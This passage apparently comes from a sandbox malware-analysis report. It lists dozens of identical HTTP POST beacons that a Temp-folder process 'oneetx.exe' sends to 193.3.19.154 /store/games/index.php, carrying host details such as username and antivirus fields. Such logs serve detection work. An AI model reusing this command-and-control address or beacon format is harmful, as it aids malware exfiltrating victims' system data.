                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.449784193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:53.137406111 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.449795193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:57.374092102 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.449806193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:01.647985935 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.449817193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:05.888936043 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.449828193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:10.124281883 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.449839193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:14.344291925 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.449848193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:18.579659939 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.449858193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:22.811232090 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.449867193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:27.045433998 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.449878193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:31.282150030 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.449909193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:44.937906981 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.449920193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:49.173223019 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.449931193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:53.405967951 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.449942193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:03:57.824795008 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.449953193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:02.061980963 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.449964193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:06.295145988 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.449973193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:10.519671917 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.449981193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:14.749638081 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.449992193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:19.018697977 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.450003193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:23.248563051 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.450013193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:27.484415054 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.450024193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:31.718524933 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.450035193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:35.939897060 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.450044193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:40.187061071 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.450047193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:44.423559904 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.450048193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:48.675873041 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.450049193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:52.909507990 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.450050193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:04:57.142074108 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.450051193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:01.392184019 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.450052193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:05.625243902 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.450053193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:05:09.859699011 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
